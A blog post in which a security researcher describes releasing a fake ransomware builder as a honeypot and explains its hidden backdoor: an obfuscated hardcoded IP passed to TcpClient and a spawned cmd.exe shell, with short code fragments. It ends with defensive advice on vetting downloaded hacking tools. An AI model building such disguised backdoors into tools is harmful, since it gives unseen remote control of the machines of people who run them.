How I hacked 100 hackers
… Or script kiddies I could say
“Boredom always precedes a period of great creativity” — Robert M. Pirsig
How it started
How it ended
Jinn Ransomware Builder on Social Media
What was “Jinn Ransomware” supposed to be?
A builder that was able to construct a fully customizable ransomware with the following features:
- C2 Callbacks
- Multi-language support (PowerShell/C#/Python)
- AES encryption & decryption
- No detection
What it is in reality
Jinn Ransomware Builder is actually a honeypot, but some of the features presented above are real.
Let’s add the missing words to the list:
1. C2 Callbacks — backdoored & hardcoded:
The TcpClient() function takes two arguments — the host and port destination
As you can observe, the host argument is constructed using Substring() function, which extracts the IP address from the long string.
Process _Tiger = new Process();Is being used to initiate a new process into the memory.
_Tiger.StartInfo.Filename = GetFileName();Note down this function, we will explain it below.
The GetFileName() function is used to build the stager name using the same Substring() function as in TcpClient() function.
Result: CmD.eXE
Conclusion: Our code is used to initiate a remote connection and open a process with the “CmD.eXE” executable that is being hosted on that server.
2. Multi-language support (PowerShell/C#/Python) — theoretical yes:
…But in practice, it is actually just a prompt
The user was supposed to create the configuration of the ransomware implant from the command line, by completing the C2 details, language of the implant (PowerShell, C#, Python), Persistence mode (None, Scheduled Task, New Account Creation), Password for Decryption and the list of file extensions to be encrypted.
In the end, the builder was supposed to generate two executables— one used for encryption and one for decryption.
It was used to add more spice to the features list, don’t be mad please!
3. AES encryption & decryption — but the functions are not fully function:
Those were added to the builder in order to:
- Make it look like a legit ransomware builder
- Hide the hardcoded backdoor in plain sight
In reality, a basic analysis of the source code, starting from the main function of the program would reveal to us that:
The first method called is me(), which is the backdoor connection.
Definition is attached again below.
4. No detection — nothing to add here😏:
Lessons Learned
Always analyze the code within the samples of exploits & hacking tools taken from the Internet
- Check for IP addresses and ports
- Check for functions that open new connections
- Check for functions that attempt to run system commands
- If it has zero detections on VirusTotal, it doesn’t actually mean it’s benign
Verify the quality of the Threat Intelligence that you are spreading on Social Media or to your clients
Legal disclaimer
The activities were done in a simulated environment. No illegal hacking attempts were performed and I strictly discourage any such actions.
